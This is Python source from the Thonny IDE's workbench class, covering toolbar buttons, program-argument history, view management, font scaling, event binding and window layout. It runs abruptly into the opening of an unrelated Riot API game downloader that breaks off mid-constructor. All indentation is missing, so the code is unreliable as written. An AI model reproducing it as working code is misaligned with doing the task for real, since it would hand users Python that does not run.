self._apply_syntax_theme(self.get_option("view.syntax_theme"))
def uses_dark_ui_theme(self) -> bool:
name = self._style.theme_use()
while True:
if "dark" in name.lower():
return True
name, _, _ = self._ui_themes[name]
if name is None:
# reached start of the chain
break
return False
def _init_program_arguments_frame(self) -> None:
self.set_default("view.show_program_arguments", False)
self.set_default("run.program_arguments", "")
self.set_default("run.past_program_arguments", [])
visibility_var = self.get_variable("view.show_program_arguments")
content_var = self.get_variable("run.program_arguments")
frame = ttk.Frame(self._toolbar)
col = 1000
self._toolbar.columnconfigure(col, weight=1)
label = ttk.Label(frame, text=tr("Program arguments:"))
label.grid(row=0, column=0, sticky="nse", padx=5)
self.program_arguments_box = ttk.Combobox(
frame,
width=80,
height=15,
textvariable=content_var,
values=[""] + self.get_option("run.past_program_arguments"),
)
self.program_arguments_box.grid(row=0, column=1, sticky="nsew", padx=5)
frame.columnconfigure(1, weight=1)
def update_visibility():
if visibility_var.get():
if not frame.winfo_ismapped():
frame.grid(row=0, column=col, sticky="nse")
else:
if frame.winfo_ismapped():
frame.grid_remove()
def toggle():
visibility_var.set(not visibility_var.get())
update_visibility()
self.add_command(
"viewargs",
"view",
tr("Program arguments"),
toggle,
flag_name="view.show_program_arguments",
group=11,
)
update_visibility()
def _init_regular_mode_link(self):
if self.get_ui_mode() != "simple":
return
label = ttk.Label(
self._toolbar,
text=tr("Switch to\nregular\nmode"),
justify="right",
font="SmallLinkFont",
style="Url.TLabel",
cursor="hand2",
)
label.grid(row=0, column=1001, sticky="ne")
def on_click(event):
self.set_option("general.ui_mode", "regular")
tk.messagebox.showinfo(
tr("Regular mode"),
tr(
"Configuration has been updated. "
+ "Restart Thonny to start working in regular mode.\n\n"
+ "(See 'Tools → Options → General' if you change your mind later.)"
),
master=self,
)
label.bind("<1>", on_click, True)
def _init_backend_switcher(self):
if self.get_ui_mode() != "simple":
return
frame = ttk.Frame(self._toolbar)
frame.grid(row=0, column=1001, sticky="ne")
label = ttk.Label(
frame,
text=tr("Python 3 "),
# text="Python 3 ▼ ",
# text="Python 3 ▾ ",
justify="right",
# font="SmallLinkFont",
# style="Url.TLabel",
cursor="hand2",
)
label.grid(row=0, column=0, sticky="ne")
self._gear_menu = tk.Menu(frame, tearoff=False)
def post_menu():
self._gear_menu.delete(0, "end")
self._populate_gear_menu()
self._gear_menu.tk_popup(
button.winfo_rootx(),
button.winfo_rooty() + button.winfo_height(),
)
# ☼
# ≡
button = ttk.Button(frame, text=" ☼ ", style="ViewToolbar.Toolbutton", command=post_menu)
button.grid(row=1, column=0, sticky="ne")
def on_click(event):
self.set_option("general.ui_mode", "regular")
tk.messagebox.showinfo(
tr("Regular mode"),
tr(
"Configuration has been updated. "
+ "Restart Thonny to start working in regular mode.\n\n"
+ "(See 'Tools → Options → General' if you change your mind later.)"
),
master=self,
)
label.bind("<1>", on_click, True)
def _populate_gear_menu(self):
"""Constructs the menu for upper-right gear button"""
self._gear_menu.add_checkbutton(
label="Python 3", command=lambda: self._switch_backend_group("CPython")
)
self._gear_menu.add_checkbutton(
label="MicroPython", command=lambda: self._switch_backend_group("MicroPython")
)
self._gear_menu.add_checkbutton(
label="CircuitPython", command=lambda: self._switch_backend_group("CircuitPython")
)
self._gear_menu.add_separator()
self._gear_menu.add_checkbutton(
label=tr("Light"), command=lambda: self._switch_darkness("light")
)
self._gear_menu.add_checkbutton(
label=tr("Dark"), command=lambda: self._switch_darkness("dark")
)
self._gear_menu.add_separator()
self._gear_menu.add_command(
label=tr("Switch to regular mode"), command=self._switch_to_regular_mode
)
def _switch_backend_group(self, group):
pass
def _switch_darkness(self, mode):
pass
def _switch_to_regular_mode(self):
pass
def log_program_arguments_string(self, arg_str: str) -> None:
arg_str = arg_str.strip()
self.set_option("run.program_arguments", arg_str)
if arg_str == "":
# empty will be handled differently
return
past_args = self.get_option("run.past_program_arguments")
if arg_str in past_args:
past_args.remove(arg_str)
past_args.insert(0, arg_str)
past_args = past_args[:10]
self.set_option("run.past_program_arguments", past_args)
self.program_arguments_box.configure(values=[""] + past_args)
def _show_views(self) -> None:
for view_id in self._view_records:
if self._view_records[view_id]["visibility_flag"].get():
try:
self.show_view(view_id, False)
except Exception:
self.report_exception("Problem showing " + view_id)
def update_image_mapping(self, mapping: Dict[str, str]) -> None:
"""Was used by thonny-pi. Not recommended anymore"""
self._default_image_mapping.update(mapping)
def get_backends(self) -> Dict[str, BackendSpec]:
return self._backends
def get_option(self, name: str, default=None) -> Any:
# Need to return Any, otherwise each typed call site needs to cast
return self._configuration_manager.get_option(name, default)
def set_option(self, name: str, value: Any) -> None:
self._configuration_manager.set_option(name, value)
def get_local_cwd(self) -> str:
cwd = self.get_option("run.working_directory")
if os.path.exists(cwd):
return normpath_with_actual_case(cwd)
else:
return normpath_with_actual_case(os.path.expanduser("~"))
def set_local_cwd(self, value: str) -> None:
if self.get_option("run.working_directory") != value:
self.set_option("run.working_directory", value)
if value:
self.event_generate("LocalWorkingDirectoryChanged", cwd=value)
def set_default(self, name: str, default_value: Any) -> None:
"""Registers a new option.
If the name contains a period, then the part left of the (first) period
becomes the section of the option and the rest becomes the option name
under that section.
If the name doesn't contain a period, then it will be added under the
section "general".
"""
self._configuration_manager.set_default(name, default_value)
def get_variable(self, name: str) -> tk.Variable:
return self._configuration_manager.get_variable(name)
def get_menu(self, name: str, label: Optional[str] = None) -> tk.Menu:
"""Gives the menu with given name. Creates if not created yet.
Args:
name: meant to be used as a non-translatable menu name
label: translated label, used only when a menu with the given name doesn't exist yet
"""
if name not in self._menus:
if running_on_mac_os():
conf = {}
else:
conf = get_style_configuration("Menu")
menu = tk.Menu(self._menubar, **conf)
menu["postcommand"] = lambda: self._update_menu(menu, name)
self._menubar.add_cascade(label=label if label else name, menu=menu)
self._menus[name] = menu
if label:
self._menus[label] = menu
return self._menus[name]
def get_view(self, view_id: str, create: bool = True) -> tk.Widget:
if "instance" not in self._view_records[view_id]:
if not create:
raise RuntimeError("View %s not created" % view_id)
class_ = self._view_records[view_id]["class"]
location = self._view_records[view_id]["location"]
master = self._view_notebooks[location]
# create the view
view = class_(self) # View's master is workbench to allow making it maximized
view.position_key = self._view_records[view_id]["position_key"]
self._view_records[view_id]["instance"] = view
# create the view home_widget to be added into notebook
view.home_widget = ttk.Frame(master)
view.home_widget.columnconfigure(0, weight=1)
view.home_widget.rowconfigure(0, weight=1)
view.home_widget.maximizable_widget = view # type: ignore
view.home_widget.close = lambda: self.hide_view(view_id) # type: ignore
if hasattr(view, "position_key"):
view.home_widget.position_key = view.position_key # type: ignore
# initially the view will be in its home_widget
view.grid(row=0, column=0, sticky=tk.NSEW, in_=view.home_widget)
view.hidden = True
return self._view_records[view_id]["instance"]
def get_editor_notebook(self) -> EditorNotebook:
assert self._editor_notebook is not None
return self._editor_notebook
def get_package_dir(self):
"""Returns thonny package directory"""
return os.path.dirname(sys.modules["thonny"].__file__)
def get_image(
self, filename: str, tk_name: Optional[str] = None, disabled=False
) -> tk.PhotoImage:
if filename in self._image_mapping_by_theme[self._current_theme_name]:
filename = self._image_mapping_by_theme[self._current_theme_name][filename]
if filename in self._default_image_mapping:
filename = self._default_image_mapping[filename]
# if path is relative then interpret it as living in res folder
if not os.path.isabs(filename):
filename = os.path.join(self.get_package_dir(), "res", filename)
if not os.path.exists(filename):
if os.path.exists(filename + ".png"):
filename = filename + ".png"
elif os.path.exists(filename + ".gif"):
filename = filename + ".gif"
if disabled:
filename = os.path.join(
os.path.dirname(filename), "_disabled_" + os.path.basename(filename)
)
if not os.path.exists(filename):
return None
# are there platform-specific variants?
plat_filename = filename[:-4] + "_" + platform.system() + ".png"
if os.path.exists(plat_filename):
filename = plat_filename
if self._scaling_factor >= 2.0:
scaled_filename = filename[:-4] + "_2x.png"
if os.path.exists(scaled_filename):
filename = scaled_filename
else:
img = tk.PhotoImage(file=filename)
# can't use the zoom method, because it doesn't allow specifying a name
img2 = tk.PhotoImage(tk_name)
self.tk.call(
img2,
"copy",
img.name,
"-zoom",
int(self._scaling_factor),
int(self._scaling_factor),
)
self._images.add(img2)
return img2
img = tk.PhotoImage(tk_name, file=filename)
self._images.add(img)
return img
def show_view(self, view_id: str, set_focus: bool = True) -> Union[bool, tk.Widget]:
"""View must be already registered.
Args:
view_id: View class name
without package name (eg. 'ShellView')"""
if view_id == "MainFileBrowser":
# Was renamed in 3.1.1
view_id = "FilesView"
# NB! Don't forget that view.home_widget is added to notebook, not view directly
# get or create
view = self.get_view(view_id)
notebook = view.home_widget.master # type: ignore
if hasattr(view, "before_show") and view.before_show() == False: # type: ignore
return False
if view.hidden: # type: ignore
notebook.insert(
"auto", view.home_widget, text=self._view_records[view_id]["label"] # type: ignore
)
view.hidden = False # type: ignore
if hasattr(view, "on_show"): # type: ignore
view.on_show()
# switch to the tab
notebook.select(view.home_widget) # type: ignore
# add focus
if set_focus:
view.focus_set()
self.set_option("view." + view_id + ".visible", True)
self.event_generate("ShowView", view=view, view_id=view_id)
return view
def hide_view(self, view_id: str) -> Union[bool, None]:
# NB! Don't forget that view.home_widget is added to notebook, not view directly
if "instance" in self._view_records[view_id]:
# TODO: handle the case, when view is maximized
view = self._view_records[view_id]["instance"]
if view.hidden:
return True
if hasattr(view, "before_hide") and view.before_hide() == False:
return False
view.home_widget.master.forget(view.home_widget)
self.set_option("view." + view_id + ".visible", False)
self.event_generate("HideView", view=view, view_id=view_id)
view.hidden = True
return True
def event_generate(self, sequence: str, event: Optional[Record] = None, **kwargs) -> None:
"""Uses custom event handling when sequence doesn't start with <.
In this case arbitrary attributes can be added to the event.
Otherwise forwards the call to Tk's event_generate"""
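# For example, event_generate("WorkbenchClose") dispatches to handlers registered via
# bind("WorkbenchClose", ...), whereas a sequence such as "<FocusIn>" goes straight to Tk.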
# pylint: disable=arguments-differ
if sequence.startswith("<"):
assert event is None
tk.Tk.event_generate(self, sequence, **kwargs)
else:
if sequence in self._event_handlers:
if event is None:
event = WorkbenchEvent(sequence, **kwargs)
else:
event.update(kwargs)
# make a copy of handlers, so that event handler can remove itself
# from the registry during iteration
# (or new handlers can be added)
for handler in sorted(self._event_handlers[sequence].copy(), key=str):
try:
handler(event)
except Exception:
self.report_exception("Problem when handling '" + sequence + "'")
if not self._closing:
self._update_toolbar()
def bind(self, sequence: str, func: Callable, add: bool = None) -> None: # type: ignore
"""Uses custom event handling when sequence doesn't start with <.
Otherwise forwards the call to Tk's bind"""
# pylint: disable=signature-differs
if not add:
logging.warning(
"Workbench.bind({}, ..., add={}) -- did you really want to replace existing bindings?".format(
sequence, add
)
)
if sequence.startswith("<"):
tk.Tk.bind(self, sequence, func, add)
else:
if sequence not in self._event_handlers or not add:
self._event_handlers[sequence] = set()
self._event_handlers[sequence].add(func)
def unbind(self, sequence: str, func=None) -> None:
# pylint: disable=arguments-differ
if sequence.startswith("<"):
tk.Tk.unbind(self, sequence, funcid=func)
else:
try:
self._event_handlers[sequence].remove(func)
except Exception:
logger.exception("Can't remove binding for '%s' and '%s'", sequence, func)
def in_heap_mode(self) -> bool:
# TODO: add a separate command for enabling the heap mode
# untie the mode from HeapView
return self._configuration_manager.has_option("view.HeapView.visible") and self.get_option(
"view.HeapView.visible"
)
def in_debug_mode(self) -> bool:
return (
os.environ.get("THONNY_DEBUG", False)
in [
"1",
1,
"True",
True,
"true",
]
or self.get_option("general.debug_mode", False)
)
def _init_scaling(self) -> None:
self._default_scaling_factor = self.tk.call("tk", "scaling")
if self._default_scaling_factor > 10:
# it may be infinity, e.g. on Fedora
self._default_scaling_factor = 1.33
scaling = self.get_option("general.scaling")
if scaling in ["default", "auto"]: # auto was used in 2.2b3
self._scaling_factor = self._default_scaling_factor
else:
self._scaling_factor = float(scaling)
MAC_SCALING_MODIFIER = 1.7
if running_on_mac_os():
self._scaling_factor *= MAC_SCALING_MODIFIER
self.tk.call("tk", "scaling", self._scaling_factor)
font_scaling_mode = self.get_option("general.font_scaling_mode")
if (
running_on_linux()
and font_scaling_mode in ["default", "extra"]
and scaling not in ["default", "auto"]
):
# update system fonts which are given in pixel sizes
for name in tk_font.names():
f = tk_font.nametofont(name)
orig_size = f.cget("size")
# According to the documentation, absolute values of negative font sizes
# should be interpreted as pixel sizes (not affected by "tk scaling")
# and positive values are point sizes, which are supposed to scale automatically
# http://www.tcl.tk/man/tcl8.6/TkCmd/font.htm#M26
# Unfortunately it seems that this cannot be relied on
# https://groups.google.com/forum/#!msg/comp.lang.tcl/ZpL6tq77M4M/GXImiV2INRQJ
# My experiments show that manually changing negative font sizes
# doesn't have any effect -- fonts keep their default size
# (Tested in Raspbian Stretch, Ubuntu 18.04 and Fedora 29)
# On the other hand positive sizes scale well (and they don't scale automatically)
# convert pixel sizes to point_size
if orig_size < 0:
orig_size = -orig_size / self._default_scaling_factor
# scale
scaled_size = round(
orig_size * (self._scaling_factor / self._default_scaling_factor)
)
f.configure(size=scaled_size)
elif running_on_mac_os() and scaling not in ["default", "auto"]:
# see http://wiki.tcl.tk/44444
# update system fonts
for name in tk_font.names():
f = tk_font.nametofont(name)
orig_size = f.cget("size")
assert orig_size > 0
f.configure(size=int(orig_size * self._scaling_factor / MAC_SCALING_MODIFIER))
def update_fonts(self) -> None:
editor_font_size = self._guard_font_size(self.get_option("view.editor_font_size"))
editor_font_family = self.get_option("view.editor_font_family")
io_font_size = self._guard_font_size(self.get_option("view.io_font_size"))
io_font_family = self.get_option("view.io_font_family")
for io_name in [
"IOFont",
"BoldIOFont",
"UnderlineIOFont",
"ItalicIOFont",
"BoldItalicIOFont",
]:
tk_font.nametofont(io_name).configure(family=io_font_family, size=io_font_size)
try:
shell = self.get_view("ShellView", create=False)
except Exception:
# the shell may not be created yet
pass
else:
shell.update_tabs()
tk_font.nametofont("EditorFont").configure(family=editor_font_family, size=editor_font_size)
tk_font.nametofont("SmallEditorFont").configure(
family=editor_font_family, size=editor_font_size - 2
)
tk_font.nametofont("BoldEditorFont").configure(
family=editor_font_family, size=editor_font_size
)
tk_font.nametofont("ItalicEditorFont").configure(
family=editor_font_family, size=editor_font_size
)
tk_font.nametofont("BoldItalicEditorFont").configure(
family=editor_font_family, size=editor_font_size
)
if self.get_ui_mode() == "simple":
default_size_factor = max(0.7, 1 - (editor_font_size - 10) / 25)
small_size_factor = max(0.6, 0.8 - (editor_font_size - 10) / 25)
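# e.g. editor_font_size 10 gives factors 1.0 / 0.8, while size 20 hits the 0.7 / 0.6
# clamps, so simple-mode captions never shrink below roughly 70% of the editor font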
tk_font.nametofont("TkDefaultFont").configure(
size=round(editor_font_size * default_size_factor)
)
tk_font.nametofont("TkHeadingFont").configure(
size=round(editor_font_size * default_size_factor)
)
tk_font.nametofont("SmallLinkFont").configure(
size=round(editor_font_size * small_size_factor)
)
# Update Treeview font and row height
if running_on_mac_os():
treeview_font_size = int(editor_font_size * 0.7 + 4)
else:
treeview_font_size = int(editor_font_size * 0.7 + 2)
treeview_font = tk_font.nametofont("TreeviewFont")
treeview_font.configure(size=treeview_font_size)
rowheight = round(treeview_font.metrics("linespace") * 1.2)
style = ttk.Style()
style.configure("Treeview", rowheight=rowheight)
if self._editor_notebook is not None:
self._editor_notebook.update_appearance()
def _get_menu_index(self, menu: tk.Menu) -> int:
for i in range(len(self._menubar.winfo_children())):
if menu == self._menubar.winfo_children()[i]:
return i
raise RuntimeError("Couldn't find menu")
def _add_toolbar_button(
self,
command_id: str,
image: Optional[tk.PhotoImage],
disabled_image: Optional[tk.PhotoImage],
command_label: str,
caption: str,
alternative_caption: str,
accelerator: Optional[str],
handler: Callable[[], None],
tester: Optional[Callable[[], bool]],
toolbar_group: int,
) -> None:
assert caption is not None and len(caption) > 0, (
"Missing caption for '%s'. Toolbar commands must have caption." % command_label
)
slaves = self._toolbar.grid_slaves(0, toolbar_group)
if len(slaves) == 0:
group_frame = ttk.Frame(self._toolbar)
if self.in_simple_mode():
padx = 0 # type: Union[int, Tuple[int, int]]
else:
padx = (0, 10)
group_frame.grid(row=0, column=toolbar_group, padx=padx)
else:
group_frame = slaves[0]
if self.in_simple_mode():
screen_width = self.winfo_screenwidth()
if screen_width >= 1280:
button_width = max(7, len(caption), len(alternative_caption))
elif screen_width >= 1024:
button_width = max(6, len(caption), len(alternative_caption))
else:
button_width = max(5, len(caption), len(alternative_caption))
else:
button_width = None
if disabled_image is not None:
image_spec = [image, "disabled", disabled_image]
else:
image_spec = image
button = ttk.Button(
group_frame,
image=image_spec,
style="Toolbutton",
state=tk.NORMAL,
text=caption,
compound="top" if self.in_simple_mode() else None,
pad=(10, 0) if self.in_simple_mode() else None,
width=button_width,
)
def toolbar_handler(*args):
handler(*args)
self._update_toolbar()
if self.focus_get() == button:
# the previously selected widget would be a better candidate,
# but focusing the editor is still better than leaving focus on the button
self._editor_notebook.focus_set()
button.configure(command=toolbar_handler)
button.pack(side=tk.LEFT)
button.tester = tester # type: ignore
tooltip_text = command_label
if self.get_ui_mode() != "simple":
if accelerator and lookup_style_option(
"OPTIONS", "shortcuts_in_tooltips", default=True
):
tooltip_text += " (" + accelerator + ")"
create_tooltip(button, tooltip_text)
self._toolbar_buttons[command_id] = button
def get_toolbar_button(self, command_id):
return self._toolbar_buttons[command_id]
def _update_toolbar(self) -> None:
if self._destroyed or not hasattr(self, "_toolbar"):
return
if self._toolbar.winfo_ismapped():
for group_frame in self._toolbar.grid_slaves(0):
for button in group_frame.pack_slaves():
if thonny._runner is None or button.tester and not button.tester():
button["state"] = tk.DISABLED
else:
button["state"] = tk.NORMAL
def _cmd_zoom_with_mouse(self, event) -> None:
if event.delta > 0:
self._change_font_size(1)
else:
self._change_font_size(-1)
def _toggle_font_size(self) -> None:
current_size = self.get_option("view.editor_font_size")
if self.winfo_screenwidth() < 1024:
# assuming 32x32 icons
small_size = 10
medium_size = 12
large_size = 14
elif self.winfo_screenwidth() < 1280:
# assuming 32x32 icons
small_size = 12
medium_size = 14
large_size = 18
else:
small_size = 12
medium_size = 16
large_size = 20
widths = {10: 800, 12: 1050, 14: 1200, 16: 1300, 18: 1400, 20: 1650}
if current_size < small_size or current_size >= large_size:
new_size = small_size
elif current_size < medium_size:
new_size = medium_size
else:
new_size = large_size
self._change_font_size(new_size - current_size)
new_width = min(widths[new_size], self.winfo_screenwidth())
geo = re.findall(r"\d+", self.wm_geometry())
self.geometry("{0}x{1}+{2}+{3}".format(new_width, geo[1], geo[2], geo[3]))
def _change_font_size(self, delta: int) -> None:
if delta != 0:
editor_font_size = self.get_option("view.editor_font_size")
editor_font_size += delta
self.set_option("view.editor_font_size", self._guard_font_size(editor_font_size))
io_font_size = self.get_option("view.io_font_size")
io_font_size += delta
self.set_option("view.io_font_size", self._guard_font_size(io_font_size))
self.update_fonts()
def _guard_font_size(self, size: int) -> int:
# https://bitbucket.org/plas/thonny/issues/164/negative-font-size-crashes-thonny
MIN_SIZE = 4
MAX_SIZE = 200
if size < MIN_SIZE:
return MIN_SIZE
elif size > MAX_SIZE:
return MAX_SIZE
else:
return size
def _check_update_window_width(self, delta: int) -> None:
if not ui_utils.get_zoomed(self):
self.update_idletasks()
# TODO: shift to left if right edge goes away from screen
# TODO: check with screen width
new_geometry = "{0}x{1}+{2}+{3}".format(
self.winfo_width() + delta, self.winfo_height(), self.winfo_x(), self.winfo_y()
)
self.geometry(new_geometry)
def _maximize_view(self, event=None) -> None:
if self._maximized_view is not None:
return
# find the widget that can be relocated
widget = self.focus_get()
if isinstance(widget, (EditorNotebook, AutomaticNotebook)):
current_tab = widget.get_current_child()
if current_tab is None:
return
if not hasattr(current_tab, "maximizable_widget"):
return
widget = current_tab.maximizable_widget
while widget is not None:
if hasattr(widget, "home_widget"):
# if widget is view, then widget.master is workbench
widget.grid(row=1, column=0, sticky=tk.NSEW, in_=widget.master) # type: ignore
# hide main_frame
self._main_frame.grid_forget()
self._maximized_view = widget
self.get_variable("view.maximize_view").set(True)
break
else:
widget = widget.master # type: ignore
def _unmaximize_view(self, event=None) -> None:
if self._maximized_view is None:
return
# restore main_frame
self._main_frame.grid(row=1, column=0, sticky=tk.NSEW, in_=self)
# put the maximized view back to its home_widget
self._maximized_view.grid(
row=0, column=0, sticky=tk.NSEW, in_=self._maximized_view.home_widget # type: ignore
)
self._maximized_view = None
self.get_variable("view.maximize_view").set(False)
def show_options(self, page_key=None):
dlg = ConfigurationDialog(self, self._configuration_pages)
if page_key:
dlg.select_page(page_key)
ui_utils.show_dialog(dlg)
if dlg.backend_restart_required:
get_runner().restart_backend(False)
def _cmd_focus_editor(self) -> None:
self.get_editor_notebook().focus_set()
def _cmd_focus_shell(self) -> None:
self.show_view("ShellView", True)
shell = get_shell()
# go to the end of any current input
shell.text.mark_set("insert", "end")
shell.text.see("insert")
def _cmd_toggle_full_screen(self) -> None:
"""
TODO: For mac
http://wiki.tcl.tk/44444
Switching a window to fullscreen mode
(Normal Difference)
To switch a window to fullscreen mode, the window must first be withdrawn.
# For Linux/Mac OS X:
set cfs [wm attributes $w -fullscreen]
if { $::tcl_platform(os) eq "Darwin" } {
if { $cfs == 0 } {
# optional: save the window geometry
set savevar [wm geometry $w]
}
wm withdraw $w
}
wm attributes $w -fullscreen [expr {1-$cfs}]
if { $::tcl_platform(os) eq "Darwin" } {
wm deiconify $w
if { $cfs == 1 } {
after idle [list wm geometry $w $savevar]
}
}
"""
var = self.get_variable("view.full_screen")
var.set(not var.get())
self.attributes("-fullscreen", var.get())
def _cmd_toggle_maximize_view(self) -> None:
if self._maximized_view is not None:
self._unmaximize_view()
else:
self._maximize_view()
def _update_menu(self, menu: tk.Menu, menu_name: str) -> None:
if menu.index("end") is None:
return
for i in range(menu.index("end") + 1):
item_data = menu.entryconfigure(i)
if "label" in item_data:
command_label = menu.entrycget(i, "label")
if (menu_name, command_label) not in self._menu_item_specs:
continue
tester = self._menu_item_specs[(menu_name, command_label)].tester
enabled = not tester
if tester:
try:
enabled = tester()
except Exception:
traceback.print_exc()
enabled = False
if enabled:
menu.entryconfigure(i, state=tk.NORMAL)
else:
menu.entryconfigure(i, state=tk.DISABLED)
def _find_location_for_menu_item(self, menu_name: str, command_label: str) -> Union[str, int]:
menu = self.get_menu(menu_name)
if menu.index("end") == None: # menu is empty
return "end"
specs = self._menu_item_specs[(menu_name, command_label)]
this_group_exists = False
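# Items are kept ordered by ascending group number, with a separator between groups;
# inside a group, an "alphabetic" item is placed before the first sibling whose label
# sorts after the new command's label.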
for i in range(0, menu.index("end") + 1):
data = menu.entryconfigure(i)
if "label" in data:
# it's a command, not separator
sibling_label = menu.entrycget(i, "label")
sibling_group = self._menu_item_specs[(menu_name, sibling_label)].group
if sibling_group == specs.group:
this_group_exists = True
if specs.position_in_group == "alphabetic" and sibling_label > command_label:
return i
if sibling_group > specs.group:
assert (
not this_group_exists
) # otherwise we would have found the ending separator
menu.insert_separator(i)
return i
else:
# We found a separator
if this_group_exists:
# it must be the ending separator for this group
return i
# no group was bigger, i.e. this item should go to the end
if not this_group_exists:
menu.add_separator()
return "end"
def _poll_ipc_requests(self) -> None:
try:
if self._ipc_requests.empty():
return
while not self._ipc_requests.empty():
args = self._ipc_requests.get()
try:
for filename in args:
if os.path.isfile(filename):
self.get_editor_notebook().show_file(filename)
except Exception:
traceback.print_exc()
self.become_active_window()
finally:
self.after(50, self._poll_ipc_requests)
def _on_close(self) -> None:
if self._editor_notebook and not self._editor_notebook.check_allow_closing():
return
self._closing = True
try:
self._save_layout()
self._editor_notebook.remember_open_files()
self.event_generate("WorkbenchClose")
self._configuration_manager.save()
except Exception:
self.report_exception()
self.destroy()
self._destroyed = True
def _on_all_key_presses(self, event):
if running_on_windows():
ui_utils.handle_mistreated_latin_shortcuts(self._latin_shortcuts, event)
def _on_focus_in(self, event):
if self._lost_focus:
self._lost_focus = False
self.event_generate("WindowFocusIn")
def _on_focus_out(self, event):
if self.focus_get() is None:
if not self._lost_focus:
self._lost_focus = True
self.event_generate("WindowFocusOut")
def focus_get(self) -> Optional[tk.Widget]:
try:
return tk.Tk.focus_get(self)
except Exception:
# This may give an error on Ubuntu
return None
def destroy(self) -> None:
try:
if self._is_server() and os.path.exists(thonny.get_ipc_file_path()):
os.remove(thonny.get_ipc_file_path())
self._closing = True
# Tk clipboard gets cleared on exit and won't end up in system clipboard
# https://bugs.python.org/issue1207592
# https://stackoverflow.com/questions/26321333/tkinter-in-python-3-4-on-windows-dont-post-internal-clipboard-data-to-the-windo
try:
clipboard_data = self.clipboard_get()
if len(clipboard_data) < 1000 and all(
map(os.path.exists, clipboard_data.splitlines())
):
# Looks like the clipboard contains file name(s)
# Most likely this means actual file cut/copy operation
# was made outside of Thonny.
# Don't want to replace this with simple string data of file names.
pass
else:
copy_to_clipboard(clipboard_data)
except Exception:
pass
except Exception:
logging.exception("Error while destroying workbench")
finally:
try:
super().destroy()
finally:
runner = get_runner()
if runner != None:
runner.destroy_backend()
def _on_configure(self, event) -> None:
# called when window is moved or resized
if (
hasattr(self, "_maximized_view") # configure may happen before the attribute is defined
and self._maximized_view # type: ignore
):
# grid again, otherwise it acts weird
self._maximized_view.grid(
row=1, column=0, sticky=tk.NSEW, in_=self._maximized_view.master # type: ignore
)
def _on_tk_exception(self, exc, val, tb) -> None:
# copied from tkinter.Tk.report_callback_exception with modifications
# see http://bugs.python.org/issue22384
sys.last_type = exc
sys.last_value = val
sys.last_traceback = tb
self.report_exception()
def report_exception(self, title: str = "Internal error") -> None:
logging.exception(title)
if tk._default_root and not self._closing: # type: ignore
(typ, value, _) = sys.exc_info()
assert typ is not None
if issubclass(typ, UserError):
msg = str(value)
else:
msg = traceback.format_exc()
dlg = ui_utils.LongTextDialog(title, msg, parent=self)
ui_utils.show_dialog(dlg, self)
def _open_views(self) -> None:
for nb_name in self._view_notebooks:
view_name = self.get_option("layout.notebook_" + nb_name + "_visible_view")
if view_name != None:
if view_name == "GlobalsView":
# was renamed in 2.2b5
view_name = "VariablesView"
if self.get_ui_mode() != "simple" or view_name in SIMPLE_MODE_VIEWS:
self.show_view(view_name)
# make sure VariablesView is at least loaded
# otherwise it may miss globals events
# and will show empty table on open
self.get_view("VariablesView")
if (
self.get_option("assistance.open_assistant_on_errors")
or self.get_option("assistance.open_assistant_on_warnings")
) and (self.get_ui_mode() != "simple" or "AssistantView" in SIMPLE_MODE_VIEWS):
self.get_view("AssistantView")
def _save_layout(self) -> None:
self.update_idletasks()
self.set_option("layout.zoomed", ui_utils.get_zoomed(self))
for nb_name in self._view_notebooks:
widget = self._view_notebooks[nb_name].get_visible_child()
if hasattr(widget, "maximizable_widget"):
view = widget.maximizable_widget
view_name = type(view).__name__
self.set_option("layout.notebook_" + nb_name + "_visible_view", view_name)
else:
self.set_option("layout.notebook_" + nb_name + "_visible_view", None)
if not ui_utils.get_zoomed(self) or running_on_mac_os():
# can't restore zoom on mac without setting actual dimensions
gparts = re.findall(r"\d+", self.wm_geometry())
self.set_option("layout.width", int(gparts[0]))
self.set_option("layout.height", int(gparts[1]))
self.set_option("layout.left", int(gparts[2]))
self.set_option("layout.top", int(gparts[3]))
self.set_option("layout.west_pw_width", self._west_pw.preferred_size_in_pw)
self.set_option("layout.east_pw_width", self._east_pw.preferred_size_in_pw)
for key in ["nw", "sw", "s", "se", "ne"]:
self.set_option(
"layout.%s_nb_height" % key, self._view_notebooks[key].preferred_size_in_pw
)
def update_title(self, event=None) -> None:
editor = self.get_editor_notebook().get_current_editor()
if self._is_portable:
title_text = "Portable Thonny"
else:
title_text = "Thonny"
if editor != None:
title_text += " - " + editor.get_long_description()
self.title(title_text)
def become_active_window(self, force=True) -> None:
# Looks like at least on Windows all following is required
# for ensuring the window gets focus
# (deiconify, ..., iconify, deiconify)
self.deiconify()
if force:
self.attributes("-topmost", True)
self.after_idle(self.attributes, "-topmost", False)
self.lift()
if not running_on_linux():
# http://stackoverflow.com/a/13867710/261181
self.iconify()
self.deiconify()
editor = self.get_editor_notebook().get_current_editor()
if editor is not None:
# This method is meant to be called when a new file is opened, so it's safe to
# send the focus to the editor
editor.focus_set()
else:
self.focus_set()
def open_url(self, url):
m = re.match(r"^thonny-editor://(.*?)(#(\d+)(:(\d+))?)?$", url)
if m is not None:
filename = m.group(1).replace("%20", " ")
lineno = None if m.group(3) is None else int(m.group(3))
col_offset = None if m.group(5) is None else int(m.group(5))
if lineno is None:
self.get_editor_notebook().show_file(filename)
else:
self.get_editor_notebook().show_file_at_line(filename, lineno, col_offset)
return
m = re.match(r"^thonny-help://(.*?)(#(.+))?$", url)
if m is not None:
topic = m.group(1)
fragment = m.group(3)
self.show_view("HelpView").load_topic(topic, fragment)
return
if url.endswith(".rst") and not url.startswith("http"):
parts = url.split("#", maxsplit=1)
topic = parts[0][:-4]
if len(parts) == 2:
fragment = parts[1]
else:
fragment = None
self.show_view("HelpView").load_topic(topic, fragment)
return
# Fallback
import webbrowser
webbrowser.open(url, False, True)
def open_help_topic(self, topic, fragment=None):
self.show_view("HelpView").load_topic(topic, fragment)
def bell(self, displayof=0):
if not self.get_option("general.disable_notification_sound"):
super().bell(displayof=displayof)
def _mac_quit(self, *args):
self._on_close()
def _is_server(self):
return self._ipc_requests is not None
def get_toolbar(self):
return self._toolbar
class WorkbenchEvent(Record):
def __init__(self, sequence: str, **kwargs) -> None:
Record.__init__(self, **kwargs)
self.sequence = sequence
DataDownloader.py
# Download games from the Riot API from Challenger/Master players
import configparser
import multiprocessing
import os
import pickle
import random
import sys
import time
from Modes import Base_Mode
from multiprocessing import Manager
from InterfaceAPI import InterfaceAPI, ApiError, ApiError404, ApiError403
ATTEMPTS = 3
class DataDownloader:
def __init__(self, database, patch, region, leagues, timestamped_patches):
self.api = InterfaceAPI()
self.database = database
self.region = region
self.patch = patch
self.timestamped_patches = timestamped_patches
self.db = os.path.join(self.database, 'patches', self.patch, self.region)
